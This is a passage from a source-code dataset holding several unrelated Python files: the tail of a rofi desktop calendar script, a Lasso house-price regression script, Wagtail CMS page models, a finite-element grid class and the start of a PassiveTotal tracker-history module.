NB_COL * ROW_CAL_START\n\n # offset due to first month day\n start_day, _ = calendar.monthrange(year, month)\n # and correct by day starting the week\n ind_start_day = (start_day - (FIRST_DAY_WEEK - 1)) % 7\n\n # make month start at 0\n day = int(day) - 1\n\n # row-by-row index\n ind_r = cal_offset + day + ind_start_day\n # calendar coordinate\n row, col = ind_r // NB_COL, ind_r % NB_COL\n # rofi coordinate (column-by-column index)\n ind_c = col * NB_ROW + row\n\n return ind_c\n\n\ndef get_month_events(date):\n \"\"\"\n Return events files paths that are attached to date's month\n\n Parameters\n ----------\n date : datetime.date\n Any day of the month displayed\n\n Returns\n -------\n list\n list of files that belong to date.month\n \"\"\"\n\n # folder of the actual watched events\n path = EVENTS_PATHS[EVENTS_DEFAULT]\n\n # transform all directive '< montth' into regex\n # \"%a-%d-%b-%m-%Y\" --> \"[a-zA-Z.]*-[0-9]*-%b-%m-%Y\"\n file_pattern = re.sub('%-{0,1}[dwjhHIMSfzZ]', '[0-9]*', str(path))\n file_pattern = re.sub('%[aAp]', '[a-zA-Z.]*', file_pattern)\n\n # format all others directives (>= month) with date\n # \"[a-zA-Z.]*-[0-9]*-%b-%m-%Y\" --> \"[a-zA-Z.]*-[0-9]*-Jan.-01-2021\"\n file_pattern = date.strftime(file_pattern) #f\"{date.year}-{date.month}-\"\n\n # return all elements that belong to current month (match previous regex)\n path = Path(file_pattern)\n events_paths = list(Path(path.parent).glob(path.name))\n\n return events_paths\n\n\ndef get_month_events_ind(date):\n \"\"\"\n Return rofi-formatted index of days with attached event\n\n Parameters\n ----------\n date : datetime.date\n Any day of the month displayed\n\n Returns\n -------\n str\n Column index list formatted for rofi\n \"\"\"\n\n # get file list\n events_paths = get_month_events(date)\n # event name\n date_format = EVENTS_PATHS[EVENTS_DEFAULT].name\n # make capture group for day number (%d)\n pattern = re.sub('%d',r'([0-9]*)', date_format)\n # 
create pattern for directives < month\n pattern = re.sub('%-{0,1}[dwjhHIMSfzZ]',r'[0-9]*', pattern)\n pattern = re.sub('%[aAp]',r'[a-zA-Z.]*', pattern)\n # replace other (>= month) with real date\n pattern = date.strftime(pattern)\n # match the day (%d) capture group for each event in events_paths\n days = [re.match(pattern, f.name).group(1) for f in events_paths]\n # transform into rofi index\n inds = [cal2rofi_ind(int(d), date.month, date.year) for d in days]\n # format into rofi command\n inds = \",\".join([str(i) for i in inds])\n\n return inds\n\n# Count recursive call from open_n_reload_rofi\n# and prevent relaunching rofi if it's already planned\nROFI_RELAUNCH_COUNT = 0\n\ndef open_n_reload_rofi(func):\n \"\"\" decorator to open and reload the rofi script at the same date\"\"\"\n\n script_path = DIRNAME# os.path.abspath(os.path.dirname(sys.argv[0]))\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n\n global ROFI_RELAUNCH_COUNT\n\n ROFI_RELAUNCH_COUNT += 1\n subprocess.Popen([\"pkill\", \"-9\", \"rofi\"])\n time.sleep(ROFI_RELOAD_TEMPO)\n\n out = func(*args)\n\n ROFI_RELAUNCH_COUNT -= 1\n if ROFI_RELAUNCH_COUNT == 0:\n time.sleep(ROFI_RELOAD_TEMPO)\n #cmd_args = ' '.join(sys.argv[1:-1])\n cmd_args = sys.argv[1:-1] # 1 = command name, -1 = rofi outpub\n cmd = (str(DIRNAME / \"naivecalendar.sh\"), '-c', *cmd_args)\n #os.system(cmd)\n subprocess.Popen(cmd)\n\n return out\n\n return wrapper\n\n\n@open_n_reload_rofi\ndef show_events(date):\n \"\"\"open rofi popup with events list of selected month\n\n Parameters\n ----------\n date : datetime.date\n current month\n \"\"\"\n\n # Show month events\n parsed_events, prompts_pos = parse_month_events_files(date)\n output = rofi_popup(EVENTS_DEFAULT, parsed_events, highlights=prompts_pos, nb_lines=10)\n\n # open event file of selected day\n event= EVENTS_PATHS[EVENTS_DEFAULT]\n\n event_folder = date.strftime(str(event.parent))\n event_name = output.split(':')[0].strip()\n event_ext = event.suffix\n\n event_path = f'{event_folder}/{event_name}{event_ext}'\n\n if os.path.isfile(event_path):\n edit_event_file(event_path)\n\n\n@open_n_reload_rofi\ndef show_menu(cdate):\n \"\"\"open popup menu\n\n (list .cfg SHORTCUTS section entries)\"\"\"\n\n menu = '\\n'.join([to_list(cfg_t['SHORTCUTS'][s])[-1] for s in cfg_t['SHORTCUTS']])\n menu += '\\n' + '\\n'.join([act['sym'][-1] for act in CUSTOM_ACTIONS.values()])\n output = rofi_popup(\"menu\", menu, nb_lines=7, width='20em')\n process_event_popup(output, cdate)\n\n\n#@open_n_reload_rofi\ndef open_event(day_sym, date, editor):\n \"\"\"open event with editor for the selected date\"\"\"\n\n day_ind = strip_list(SYMS_DAYS_NUM).index(day_sym) +1\n\n date_format = str(EVENTS_PATHS[EVENTS_DEFAULT])\n event_path = datetime.date(date.year, date.month, day_ind).strftime(date_format)\n\n edit_event_file(event_path, editor)\n\n\n@open_n_reload_rofi\ndef edit_event_file(event_path, editor=ARGS.editor):\n \"\"\"open event file with text editor\"\"\"\n\n event_folder = Path(event_path).parent\n if not os.path.isdir(event_folder):\n os.makedirs(event_folder)\n Path(event_path).touch()\n cmd = (*editor.split(' '), event_path)\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n sdtout, sdterr = p.communicate()\n\n\n@open_n_reload_rofi\ndef ask_event_to_display():\n \"\"\"Popup that show all events type\"\"\"\n\n events = list(EVENTS_PATHS.keys())\n events = list2rofi(events)\n\n event = rofi_popup(f\"select what to display (actual = {EVENTS_DEFAULT})\", events, nb_lines=6)\n\n 
set_event_cache(event)\n\n\n@open_n_reload_rofi\ndef ask_theme():\n \"\"\"Search themes in paths and open a popup\"\"\"\n\n themes = list(chain(*[glob.glob(f'{path}/*.rasi') for path in THEME_PATHS.values()]))\n themes = (t.split('/')[-1].split('.')[0]for t in themes)\n themes = list2rofi(sorted(set(themes)))\n #themes = '\\n'.join((t.split('/')[-1] for t in themes))\n\n theme = rofi_popup(\"select theme\", themes, nb_col=3, nb_lines=9, width='45em')\n if theme in themes:\n set_theme_cache(theme)\n else :\n print(\"this is not a valid theme\", file=sys.stderr)\n\n@open_n_reload_rofi\ndef execute_external_cmd(cmd):\n \"\"\"Execute an external system command\n try to find command in different directories:\n\n - in $HOME/.config/naivecalendar/scripts/, then in\n - in ./scripts/, then\n - in system path\n \"\"\"\n cmd_path = Path(cmd[0])\n\n if (SCRIPT_PATHS['user'] / cmd_path).exists():\n cmd = [str(SCRIPT_PATHS['user'] / cmd_path)] + cmd[1:]\n elif (SCRIPT_PATHS['rel'] / cmd_path).exists():\n cmd = [str(SCRIPT_PATHS['rel'] / cmd_path)] + cmd[1:]\n\n subprocess.Popen(cmd)\n\ndef set_pp_date(day, date, f):\n \"\"\"write date to cache with command line specified format\"\"\"\n\n d = int(day)\n m = date.month\n y = date.year\n\n pretty_date = datetime.date(y, m, d).strftime(f)\n with open(PP_CACHE, \"w\") as f:\n f.write(pretty_date + \"\\n\")\n\n\n@open_n_reload_rofi\ndef send2clipboard(day, date, f):\n \"\"\"return select date to stdout given cmd line parameter '--format'\"\"\"\n\n if shutil.which(\"xclip\") == None:\n print(\"\\nplease install xclip to use 'copy-to-clipboard' option (-x/--clipboard)\\n\", file=sys.stderr)\n sys.exit(0)\n\n d = int(day)\n m = date.month\n y = date.year\n\n pretty_date = datetime.date(y, m, d).strftime(f)\n p = subprocess.Popen(('echo', pretty_date), stdout=subprocess.PIPE)\n subprocess.check_output(('xclip', '-selection', 'clipboard'), stdin=p.stdout)\n\n sys.exit(0)\n\n\ndef first_time_init():\n \"\"\"Create config files and paths given script head variables\"\"\"\n\n if shutil.which(\"rofi\") == None:\n print(\"please install rofi\")\n sys.exit()\n\n if not os.path.exists(THEME_PATHS['user']):\n os.makedirs(THEME_PATHS['user'])\n\n if not os.path.exists(SCRIPT_PATHS['user']):\n os.makedirs(SCRIPT_PATHS['user'])\n\n for events_path in EVENTS_PATHS.values():\n if not os.path.exists(events_path.parent):\n os.makedirs(events_path.parent)\n\n if not os.path.exists(CACHE_PATH):\n os.mkdir(CACHE_PATH)\n date = datetime.date.today()\n date_buff = configparser.ConfigParser()\n date_buff[\"buffer\"] = {\"year\": date.year, \"month\": date.month}\n with open(DATE_CACHE, 'w') as date_cache:\n date_buff.write(date_cache)\n display_help(head_txt=\"Welcome to naivecalendar\")\n\n\nclass CacheDate:\n \"\"\"Class to store date\n Make easier reading and writing to date cache file\n Make easier operation on date\n\n Attributes\n ----------\n\n year : Year\n month: Month\n\n \"\"\"\n\n def __init__(self):\n\n self.now()\n self._cache = configparser.ConfigParser()\n self.year = Year(self)\n self.month = Month(self)\n\n def now(self):\n \"\"\"Set and return today date\"\"\"\n self.date = datetime.datetime.now()\n return self.date\n\n def set_month(self, month):\n \"\"\"Set and return date of the given Month\n\n Parameters\n ----------\n month : str\n month to set in '%m-%Y' format\n\n Returns\n -------\n datetime.date\n a day of the month\n \"\"\"\n\n m, y = [int(x) for x in month.split('-')]\n self.date = datetime.date(y,m,1)\n\n return self.date\n\n def read_cache(self):\n 
\"\"\"load cache ini file\"\"\"\n\n self._cache.read(DATE_CACHE)\n day = 1\n month = int(self._cache[\"buffer\"][\"month\"])\n year = int(self._cache[\"buffer\"][\"year\"])\n\n self.date = datetime.date(year, month, day)\n\n def write_cache(self):\n \"\"\"write date to ini cache file\"\"\"\n\n date = self.date\n self._cache[\"buffer\"] = {\"year\": date.year, \"month\": date.month}\n with open(DATE_CACHE, \"w\") as buff:\n self._cache.write(buff)\n\n\nclass Year:\n \"\"\"Make computation on date years\"\"\"\n def __init__(self, outer):\n self.outer = outer\n\n def __repr__(self):\n return f\"Year({self.outer.date.year})\"\n\n def __add__(self, years):\n \"\"\"\n Increment or decrement date by a number of years\n\n Parameters\n ----------\n sourcedate : datetime.date\n CacheDate to Increment\n months : int\n number of years to add\n\n Returns\n -------\n datetime.date\n Incremented date\n \"\"\"\n\n year = self.outer.date.year + years\n month = self.outer.date.month\n day = min(self.outer.date.day, calendar.monthrange(year, month)[1])\n self.outer.date = datetime.date(year, month, day)\n\n def __sub__(self, years):\n self.__add__(-years)\n\n\nclass Month:\n \"\"\"Make computation on date months\"\"\"\n def __init__(self, outer):\n self.outer = outer\n\n def __repr__(self):\n return f\"Month({self.outer.date.month})\"\n\n def __add__(self, months):\n \"\"\"\n Increment or decrement date by a number of month\n\n Parameters\n ----------\n sourcedate : datetime.date\n CacheDate to Increment\n months : int\n number of month to add\n\n Returns\n -------\n datetime.date\n Incremented date\n \"\"\"\n\n month = self.outer.date.month - 1 + months\n year = self.outer.date.year + month // 12\n month = month % 12 + 1\n day = min(self.outer.date.day, calendar.monthrange(year, month)[1])\n\n self.outer.date = datetime.date(year, month, day)\n # return datetime.date(year, month, day)\n\n def __sub__(self, months):\n self.__add__(-months)\n\n\ndef joke(sym):\n \"\"\"Just display stupid jokes in french\"\"\"\n\n if sym == DAY_FORMAT.format(\"\"):\n print(\n \"Vous glissez entre les mois, vous perdez la notion du temps.\",\n file=sys.stderr,\n )\n elif sym in SYMS_WEEK_DAYS:\n print(\"Ceci n'est pas un jour! 
R.Magritte.\", file=sys.stderr)\n\n\ndef set_theme_cache(selected):\n \"\"\"Write theme name to cache file\"\"\"\n\n with open(THEME_CACHE, 'w') as f:\n f.write(selected)\n\n\ndef set_event_cache(selected):\n \"\"\"Write theme name to cache file\"\"\"\n\n with open(EVENT_CACHE, 'w') as f:\n f.write(selected)\n\n\ndef rofi_popup(txt_head, txt_body, nb_lines=15, nb_col=1, width='40%', highlights=1000):\n \"\"\"Launch a rofi window\n\n Parameters\n ----------\n txt_body : str\n Text to display in rofi window\n txt_head : str\n Text to display in rofi prompt\n\n Returns\n -------\n str\n Rofi selected cell content\n \"\"\"\n\n cmd = subprocess.Popen(('echo', txt_body), stdout=subprocess.PIPE)\n\n theme_str = f'''\n @import \"{THEME_RASI_FILE}\"\n #window {{\n location: center;\n width: {width};\n }}\n #listview {{\n columns: {nb_col};\n lines: {nb_lines};\n witdh: {width};\n }}\n '''\n\n #rofi_cmd = f'''rofi -dmenu -theme-str '{theme_str}' -p \"{txt_head}\" -u {highlights}'''\n rofi_cmd = ('rofi', '-dmenu', '-theme-str', theme_str, '-p', txt_head, '-u', str(highlights))\n selection = (\n subprocess.check_output(rofi_cmd, stdin=cmd.stdout)\n .decode(\"utf-8\")\n .replace(\"\\n\", \"\")\n )\n\n return selection\n\n\n@open_n_reload_rofi\ndef display_help(head_txt=\"help:\"):\n \"\"\"Show a rofi popup with help message\"\"\"\n\n\n txt = f\"\"\"NaïveCalendar {__version__}\n\nUsage:\n - Use mouse or keyboard to interact with the calendar.\n - Hit bottom arrows to cycle through months.\n - Hit a day to create a linked event.\n(A day with attached event will appear yellow.)\n - Create multiple event type and with between them\n\nShortcuts (type it in rofi prompt) :\"\"\"\n\n txt += '\\n{:>20} : display this help'.format(','.join(SYM_SHOW_HELP[:-1]))\n txt += '\\n{:>20} : go to previous year'.format(','.join(SYM_PREV_YEAR))\n txt += '\\n{:>20} : go to previous month'.format(','.join(SYM_PREV_MONTH))\n txt += '\\n{:>20} : go to next month'.format(','.join(SYM_NEXT_MONTH))\n txt += '\\n{:>20} : go to next year'.format(','.join(SYM_NEXT_YEAR))\n txt += '\\n{:>20} : display events of the month (first line)'.format(','.join(SYM_SHOW_EVENTS[:-1]))\n txt += '\\n{:>20} : switch events folder to display'.format(','.join(SYM_SWITCH_EVENT[:-1]))\n txt += '\\n{:>20} : show theme selector'.format(','.join(SYM_SWITCH_THEME[:-1]))\n txt += '\\n{:>20} : display a selection menu (skip shortcuts)'.format(','.join(SYM_SHOW_MENU[:-1]))\n\n txt += f\"\"\"\\n\nCommand line option:\n\nsubcommands:\n update-themes Update a calendar parameter for all user themes at once\n add-event Add, modify, delete event in all user themes config at once\n configure Clone or open configuration files\n\noptional arguments:\n -h, --help\n -V, --version\n -v, --verbose\n -p, --print\n -x, --clipboard\n -f FORMAT, --format FORMAT\n -e EDITOR, --editor EDITOR\n -l LOCALE, --locale LOCALE\n -c, --read-cache\n -t THEME, --theme THEME\n -d DATE, --date DATE\n\nThat's all : press enter to continue...\n\"\"\"\n\n rofi_popup(\"Help\", txt, nb_lines=20, width='45em')\n\n\nif __name__ == \"__main__\":\n main(ARGS, ROFI_OUTPUT)\n\n #print(\"loop time =\", \"{:.2f}\".format(1000*(time.time() - START)), 'ms', file=sys.stderr)\n\n","repo_name":"Daguhh/naivecalendar","sub_path":"src/naivecalendar.py","file_name":"naivecalendar.py","file_ext":"py","file_size_in_byte":38383,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"94"} +{"seq_id":"24298008565","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 
-*-\n\"\"\"\nCreated on Sat Nov 6 14:28:42 2021\n\n@author: abdul\n\"\"\"\n\n# to handle datasets\nimport pandas as pd\nimport numpy as np\n\n# for plotting\nimport matplotlib.pyplot as plt\n\n# to save the model\nimport joblib\n\n# to build the model\nfrom sklearn.linear_model import Lasso\n\n# to evaluate the model\nfrom sklearn.metrics import mean_squared_error, r2_score\n\n# to visualise al the columns in the dataframe\npd.pandas.set_option('display.max_columns', None)\n\n\n# to find out how to create these datasets\n\nX_train = pd.read_csv('xtrain.csv')\nX_test = pd.read_csv('xtest.csv')\n\nX_train.head()\n\n\ny_train = pd.read_csv('ytrain.csv')\ny_test = pd.read_csv('ytest.csv')\n\ny_train.head()\n\n# load the pre-selected features\n# ==============================\nfeatures = pd.read_csv('selected_features.csv')\nfeatures = features['0'].to_list() \n\n# display final feature set\nfeatures\n\n# reduce the train and test set to the selected features\n\nX_train = X_train[features]\nX_test = X_test[features]\n\n\n\nlin_model = Lasso(alpha=0.001, random_state=0)\n\n# train the model\n\nlin_model.fit(X_train, y_train)\n\n# make predictions for train set\npred = lin_model.predict(X_train)\n\n# determine mse, rmse and r2\nprint('train mse: {}'.format(int(\n mean_squared_error(np.exp(y_train), np.exp(pred)))))\nprint('train rmse: {}'.format(int(\n mean_squared_error(np.exp(y_train), np.exp(pred), squared=False))))\nprint('train r2: {}'.format(\n r2_score(np.exp(y_train), np.exp(pred))))\nprint()\n\n# make predictions for test set\npred = lin_model.predict(X_test)\n\n# determine mse, rmse and r2\nprint('test mse: {}'.format(int(\n mean_squared_error(np.exp(y_test), np.exp(pred)))))\nprint('test rmse: {}'.format(int(\n mean_squared_error(np.exp(y_test), np.exp(pred), squared=False))))\nprint('test r2: {}'.format(\n r2_score(np.exp(y_test), np.exp(pred))))\nprint()\n\nprint('Average house price: ', int(np.exp(y_train).median()))\n\n\n# let's evaluate our predictions respect to the real sale price\nplt.scatter(y_test, lin_model.predict(X_test))\nplt.xlabel('True House Price')\nplt.ylabel('Predicted House Price')\nplt.title('Evaluation of Lasso Predictions')\n\ny_test.reset_index(drop=True)\n\n# they should be fairly normally distributed\ny_test.reset_index(drop=True, inplace=True)\n\npreds = pd.Series(lin_model.predict(X_test))\n\npreds\n\n# they should be fairly normally distributed\nerrors = y_test['SalePrice'] - preds\nerrors.hist(bins=30)\nplt.show()\n\n\n# Finally, just for fun, let's look at the feature importance\nimportance = pd.Series(np.abs(lin_model.coef_.ravel()))\nimportance.index = features\nimportance.sort_values(inplace=True, ascending=False)\nimportance.plot.bar(figsize=(18,6))\nplt.ylabel('Lasso Coefficients')\nplt.title('Feature Importance')\n\n\n\n# we save Model\n# to score new data\n\njoblib.dump(lin_model, 'linear_regression.joblib') \n\n\n\n\n\n\n\n\n","repo_name":"2ahmedabdullah/Advanced-Linear-Regression-Project","sub_path":"4_model_training.py","file_name":"4_model_training.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"37486968332","text":"from django.db import models\nfrom wagtail.search import index\nfrom nsra.base.validators import phone_validator\nfrom wagtail.core.models import Page, Orderable\nfrom django.core.exceptions import ValidationError\nfrom wagtail.images.edit_handlers import ImageChooserPanel\nfrom wagtail.core.fields import RichTextField, 
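# The Lasso script above exponentiates targets and predictions before scoring, which only makes
# sense if the SalePrice target was log-transformed upstream when the train/test CSVs were built.
# A minimal, self-contained illustration of that back-transform pattern on synthetic data
# (names and numbers are made up):
import numpy as np
from sklearn.linear_model import Lasso
from sklearn.metrics import mean_squared_error

rng = np.random.default_rng(0)
X = rng.normal(size=(200, 5))
price = np.exp(X @ np.array([0.4, 0.1, 0.0, 0.3, 0.2]) + rng.normal(scale=0.05, size=200) + 5)
y_log = np.log(price)                      # the model is fit in log space

model = Lasso(alpha=0.001, random_state=0).fit(X, y_log)
pred_log = model.predict(X)

# back-transform before computing errors so the RMSE is in the original price units
rmse = np.sqrt(mean_squared_error(np.exp(y_log), np.exp(pred_log)))
print(f'train rmse (original units): {rmse:.1f}')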
StreamField\nfrom modelcluster.fields import ParentalKey, ParentalManyToManyField\nfrom wagtail.contrib.forms.models import AbstractFormField, AbstractEmailForm, AbstractForm\nfrom nsra.base.blocks import BaseStreamBlock, ParagraphStreamBlock, ImageBlock\nfrom wagtail.contrib.settings.models import BaseSetting, register_setting\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom wagtail.admin.edit_handlers import TabbedInterface, ObjectList\nfrom wagtail.snippets.edit_handlers import SnippetChooserPanel\nfrom nsra.news_and_events.models import NewsEventsIndexPage\nfrom wagtail.snippets.models import register_snippet\nfrom modelcluster.models import ClusterableModel\nfrom wagtail.core.blocks import StreamBlock\nfrom modelcluster.fields import ParentalKey\nfrom nsra.base.blocks import BaseStreamBlock\nfrom nsra.base.models import StandardPage\nfrom nsra.base.choices import COLORS\nfrom django import forms\nimport datetime\nfrom wagtail.admin.edit_handlers import (\n StreamFieldPanel,\n PageChooserPanel,\n MultiFieldPanel,\n FieldRowPanel,\n InlinePanel,\n FieldPanel,\n)\n\nfrom nsra.regional_profiles.models import RegionalProfilePage\n\nclass AboutUsPageCoreFunctionOrderable(Orderable):\n page = ParentalKey('about_us.AboutUsPage', on_delete=models.CASCADE, related_name='functions')\n function = models.ForeignKey('core_functions.CoreFunction', on_delete=models.CASCADE)\n\n panels = [\n SnippetChooserPanel('function'),\n ]\n\n\nclass AboutUsPageCarouselImages(Orderable):\n \"\"\"Between 1 and 5 images for the home page carousel.\"\"\"\n\n page = ParentalKey(\"about_us.AboutUsPage\", related_name=\"carousel_images\")\n carousel_image = models.ForeignKey(\n \"wagtailimages.Image\",\n null=True,\n blank=False,\n on_delete=models.SET_NULL,\n related_name=\"+\",\n )\n\n panels = [ImageChooserPanel(\"carousel_image\")]\n\nclass ExecutiveOrderable(Orderable):\n page = ParentalKey('about_us.AboutUsPage', on_delete=models.CASCADE, related_name='executives')\n executive = models.ForeignKey('executive.Executive', on_delete=models.CASCADE)\n\n panels = [\n SnippetChooserPanel('executive'),\n ]\n\nclass RelatedOrganizationOrderable(Orderable):\n page = ParentalKey('about_us.AboutUsPage', on_delete=models.CASCADE, related_name='related_organizations')\n organization = models.ForeignKey('base.RelatedOrganization', on_delete=models.CASCADE)\n\n panels = [\n SnippetChooserPanel('organization'),\n ]\n\n# REGIONAL PROFILES\n \nclass AboutUsPage(StandardPage):\n \n templates = \"about_us/about_us_page.html\"\n max_count = 1\n\n body = StreamField(\n [\n ('base', BaseStreamBlock()), # each block is stacked in template \n ('grid', StreamBlock( # each block is arranged in 2 grid system\n [ \n ('paragraph', ParagraphStreamBlock()), # each block is stacked in template \n ('image', ImageBlock()),\n ]\n ))\n ],\n null=True,\n blank=True\n )\n\n executive_panels = [\n InlinePanel('executives', min_num=0),\n ]\n\n organization_panels = [\n InlinePanel('related_organizations', min_num=0),\n ]\n\n # mission\n # add validation here for when there is title description required\n mission_title = models.CharField( \n max_length=1000,\n verbose_name='Section CTA link',\n help_text='mission title here',\n default='MISSION'\n )\n mission_sub_title = models.CharField(\n max_length=1000,\n verbose_name='mission sub title',\n help_text='mission subtitle here', null=True, blank=True\n )\n mission_description = models.TextField(null=True, blank=True)\n mission_icon = models.ForeignKey('wagtailimages.Image', 
on_delete=models.SET_NULL, related_name='+', null=True, blank=True)\n\n # vision\n\n vision_title = models.CharField(\n max_length=1000,\n verbose_name='vision title',\n help_text='vision title here',\n default='VISION'\n )\n vision_sub_title = models.CharField(\n max_length=1000,\n verbose_name='vision subtitle',\n help_text='vision subtitle here', null=True, blank=True\n )\n vision_description = models.TextField(null=True, blank=True)\n vision_icon = models.ForeignKey('wagtailimages.Image', on_delete=models.SET_NULL, related_name='+', null=True, blank=True)\n\n # mandate\n\n mandate_title = models.CharField(\n max_length=1000,\n verbose_name='mandate title',\n help_text='mandate title here',\n default='MANDATE'\n )\n mandate_sub_title = models.CharField(\n max_length=1000,\n verbose_name='mandate subtitle',\n help_text='mandate subtitle here', null=True, blank=True\n )\n mandate_description = models.TextField(null=True, blank=True)\n mandate_icon = models.ForeignKey('wagtailimages.Image', on_delete=models.SET_NULL, related_name='+', null=True, blank=True)\n \n\n # core functions\n functions_title = models.CharField(max_length=1000, null=True, blank=True, verbose_name='title',)\n functions_sub_title = models.CharField(max_length=1000, null=True, blank=True, verbose_name='Subtitle',)\n functions_description = models.TextField(null=True, blank=True, verbose_name='Description',)\n functions_cta_text = models.CharField(max_length=1000, null=True, blank=True, verbose_name='CTA text',)\n functions_cta_link = models.ForeignKey(\n 'core_functions.CoreFunctionIndexPage',\n on_delete=models.SET_NULL,\n null=True,\n blank=True,\n related_name='+',\n verbose_name='Core Function Index CTA link',\n help_text='Choose a core function index page to link to for the Call to Action(normally some index page)'\n )\n\n search_fields = StandardPage.search_fields + [\n index.SearchField('title'),\n index.SearchField('body'),\n ]\n\n standard_page_content_panels = [item for item in StandardPage.content_panels if not(isinstance(item, FieldPanel) and item.field_name=='body')]\n\n content_panels = [\n StreamFieldPanel('body'),\n ]\n\n core_function_panel = [\n MultiFieldPanel([\n FieldPanel('functions_title'),\n FieldPanel('functions_sub_title'),\n FieldPanel('functions_description'),\n FieldPanel('functions_cta_text'),\n FieldPanel('functions_cta_link'),\n ]),\n InlinePanel('functions', min_num=1),\n ]\n\n mvm_panels = [\n MultiFieldPanel([\n FieldPanel('mission_title'),\n FieldPanel('mission_sub_title'),\n FieldPanel('mission_description'),\n FieldPanel('mission_icon'),\n ], heading=\"mission\"),\n\n MultiFieldPanel([\n FieldPanel('vision_title'),\n FieldPanel('vision_sub_title'),\n FieldPanel('vision_description'),\n FieldPanel('vision_icon'),\n ], heading=\"vision\"),\n\n MultiFieldPanel([\n FieldPanel('mandate_title'),\n FieldPanel('mandate_sub_title'),\n FieldPanel('mandate_description'),\n FieldPanel('mandate_icon'),\n ], heading=\"mandate\"),\n ]\n\n carousel_panel = [\n MultiFieldPanel(\n [InlinePanel(\"carousel_images\", min_num=0, label=\"Image\")],\n heading=\"Carousel Images\",\n ),\n ]\n\n edit_handler = TabbedInterface([\n ObjectList(standard_page_content_panels, heading='page & hero'),\n ObjectList(carousel_panel, heading='carousel images'),\n ObjectList(content_panels, heading='body'), \n ObjectList(core_function_panel, heading='core functions'), \n ObjectList(executive_panels, heading='Executives'), \n ObjectList(organization_panels, heading='Related Organizations'), \n ObjectList(mvm_panels, 
heading='mvm'), \n ObjectList(StandardPage.promote_panels, heading='promote'),\n ObjectList(StandardPage.settings_panels, heading='settings'),\n ])\n\n def get_executives(self):\n return self.executives.filter(executive__featured=True).all()\n\n def get_related_organizations(self):\n return self.related_organizations.filter(organization__featured=True).all()\n \n def get_context(self, request):\n context = super(AboutUsPage, self).get_context(request)\n context['executives'] = self.get_executives()\n context['related_organizations'] = self.get_related_organizations()\n context['regional_profiles'] = self.get_children().type(RegionalProfilePage).live()\n return context","repo_name":"eliblurr/nrsa","sub_path":"nsra/about_us/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"15869966799","text":"from result import Result\n\nclass FemGrid(object):\n\n def __init__(self, elements, nodes):\n self.__elements=elements\n self.__nodes=nodes\n self.__kg=[[]]\n self.__fg=[]\n self.__result=Result()\n self.__dTau=0\n self.__tauArray=[]\n\n def getElement(self, i):\n return self.__elements[i]\n def getNode(self, i):\n return self.__nodes[i]\n\n def getKg(self):\n return self.__kg\n\n def getFg(self):\n return self.__fg\n\n def getNodesR(self):\n r=[]\n for node in self.__nodes:\n r.append(node.getR())\n return r\n\n def setTemperatures(self, temperatures):\n for n in self.__nodes:\n n.setTemp(temperatures.pop(0))\n\n def getTauArray(self):\n return self.__tauArray\n\n def setLocalMatrixAndVectors(self, globalData):\n for element in self.__elements:\n element.setLocalMatrixAndVector(globalData, self.__dTau)\n element.printLocalMatrixAndVector()\n\n def setGlobalMatrixAndVector(self, nh):\n self.__kg=[[0]* nh for i in range(0,nh)]\n self.__fg=[0 for i in range(0,nh)]\n\n for i in range(0, nh-1):\n ke=self.__elements[i].getKe()\n self.__kg[i][i] += ke[0][0]\n self.__kg[i][i+1] += ke[0][1]\n self.__kg[i+1][i] += ke[1][0]\n self.__kg[i+1][i+1] += ke[1][1]\n\n fe=self.__elements[i].getFe()\n self.__fg[i] += fe[0]\n self.__fg[i+1] += fe[1]\n\n def solveSystemOfEquatios(self):\n temperatures = self.__result.solveSystemOfEquation(self.__kg, self.__fg)\n return temperatures\n\n def simulateProcess(self, globalData):\n self.__dTau = globalData.getTauMax() / globalData.getNTime()\n tau = self.__dTau;\n\n while tau <= globalData.getTauMax():\n self.setLocalMatrixAndVectors(globalData)\n self.setGlobalMatrixAndVector(globalData.getNh())\n temperatures = self.solveSystemOfEquatios()\n self.setTemperatures(temperatures)\n self.__tauArray.append(tau)\n tau += self.__dTau\n\n return self.__result\n\n\n def printGlobalMatrixAndVector(self):\n print(\"Macierz globalna [K]: \\n\")\n for x in self.__kg:\n print(x)\n\n print(\"wektor globalny [F]: \\n\")\n\n for x in self.__fg:\n print(x)\n\n","repo_name":"karolskora1993/MES2","sub_path":"femgrid.py","file_name":"femgrid.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"3851985604","text":"from functools import partial\nfrom passivetotal.analyzer._common import (\n RecordList, Record, FirstLastSeen, PagedRecordList, ForPandas, AnalyzerError, AnalyzerAPIError,\n FilterDomains\n)\nfrom passivetotal.analyzer import get_api, get_config, get_object\n\n\n\nclass TrackerHistory(RecordList, PagedRecordList, ForPandas):\n\n \"\"\"Historical web 
component data.\"\"\"\n\n def _get_shallow_copy_fields(self):\n return ['_totalrecords','_query']\n \n def _get_sortable_fields(self):\n return ['firstseen','lastseen','category','label','hostname']\n \n def _get_dict_fields(self):\n return ['totalrecords']\n \n @property\n def as_dict(self):\n d = super().as_dict\n d.update({\n 'distinct_hostnames': [ str(host) for host in self.hostnames ],\n 'distinct_categories': list(self.categories),\n 'distinct_values': list(self.values)\n })\n return d\n \n def parse(self, api_response):\n \"\"\"Parse an API response.\"\"\"\n self._totalrecords = api_response.get('totalRecords', 0)\n self._records = []\n for result in api_response.get('results', []):\n self._records.append(TrackerRecord(result, self._query))\n\n @property\n def hostnames(self):\n \"\"\"List of unique hostnames in the tracker record list.\"\"\"\n return set(\n get_object(host) for host in set([record.hostname for record in self if record.hostname is not None])\n )\n \n @property\n def categories(self):\n \"\"\"List of unique categories (types) in the tracker record list.\"\"\"\n return set([record.category for record in self if record.category is not None])\n \n @property\n def values(self):\n \"\"\"List of unique tracker values in the tracker record list.\"\"\"\n return set([record.value for record in self if record.value is not None])\n\n\n\nclass TrackerRecord(Record, FirstLastSeen, ForPandas):\n\n \"\"\"Record of an observed trackers.\"\"\"\n\n def __init__(self, api_response, query=None):\n self._firstseen = 